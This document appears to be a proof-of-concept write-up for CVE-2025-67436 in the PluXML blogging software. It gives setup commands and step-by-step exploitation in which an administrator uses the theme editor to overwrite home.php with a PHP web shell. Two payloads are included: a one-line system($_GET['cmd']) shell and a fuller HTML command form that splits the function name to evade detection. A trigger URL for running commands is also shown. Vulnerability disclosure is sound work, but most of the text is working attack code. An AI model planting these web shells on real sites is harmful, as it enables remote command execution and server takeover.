git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Step-by-Step Exploitation
Authentication: Log in to the PluXML administrator panel with valid administrator credentials Navigate to Theme Editor:
Access the administration dashboard
Navigate to: Themes → Home.php → Edit
Inject Malicious Payload:
-
Replace the existing content in home.php with a PHP web shell
-
Example payload:
<?php system($_GET['cmd']); ?> -
Save the modified file
Trigger Execution:
Visit the main home page of the website The injected PHP code executes with web server privileges
- Remote commands can be executed via: http://target.com/?cmd=whoami
Reverse Shell
Payload of webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>
- CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
- PluXML Official Website: https://www.pluxml.org/
- PluXML GitHub Repository: https://github.com/pluxml/PluXml
- OWASP Top 10 - A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/